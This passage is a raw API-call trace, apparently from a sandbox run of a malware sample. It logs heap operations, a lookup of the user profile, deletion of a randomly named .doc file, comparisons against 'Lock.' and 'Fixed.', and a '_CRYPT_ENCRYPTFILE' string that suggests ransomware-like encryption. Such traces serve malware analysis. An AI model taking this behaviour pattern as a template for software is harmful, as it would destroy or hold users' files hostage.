(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0231.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0231.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0231.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0231.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0231.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0231.545] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.584] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0231.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0231.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0231.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0231.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0231.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0231.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x66) returned 0x2e564e0 [0231.585] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FpHVdISbKXY46o.doc", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc", lpFilePart=0x8cedf4*="FpHVdISbKXY46o.doc") returned 0x32 [0231.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0231.585] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fphvdisbkxy46o.doc")) returned 0x20 [0231.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb40a45c0, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0xae0c73b0, ftLastAccessTime.dwHighDateTime=0x1d5e500, ftLastWriteTime.dwLowDateTime=0xae0c73b0, ftLastWriteTime.dwHighDateTime=0x1d5e500, nFileSizeHigh=0x0, nFileSizeLow=0xad28, dwReserved0=0x1, dwReserved1=0x1c, cFileName="FpHVdISbKXY46o.doc", cAlternateFileName="FPHVDI~1.DOC")) returned 0xa87510 [0231.585] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fphvdisbkxy46o.doc")) returned 1 [0231.587] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb40a45c0, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0xae0c73b0, ftLastAccessTime.dwHighDateTime=0x1d5e500, ftLastWriteTime.dwLowDateTime=0xae0c73b0, ftLastWriteTime.dwHighDateTime=0x1d5e500, nFileSizeHigh=0x0, nFileSizeLow=0xad28, dwReserved0=0x1, dwReserved1=0x1c, cFileName="FpHVdISbKXY46o.doc", cAlternateFileName="FPHVDI~1.DOC")) returned 0 [0231.587] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0231.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0231.588] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0231.588] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0231.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0231.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0231.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0231.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x66) returned 0x2e564e0 [0231.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FpHVdISbKXY46o.doc", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc", lpFilePart=0x8cf650*="FpHVdISbKXY46o.doc") returned 0x32 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0231.589] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FpHVdISbKXY46o.doc" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fphvdisbkxy46o.doc")) returned 0xffffffff [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0231.589] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0231.589] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.589] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0231.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GxeLAc.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xeLAc.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eLAc.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LAc.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ac.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0231.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0231.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0231.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0231.591] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0231.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0231.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0231.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0231.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0231.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GxeLAc.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xeLAc.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eLAc.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LAc.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0231.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ac.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0231.592] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0231.592] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0231.592] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0231.592] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0231.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0231.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0231.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0231.593] PeekMessageW 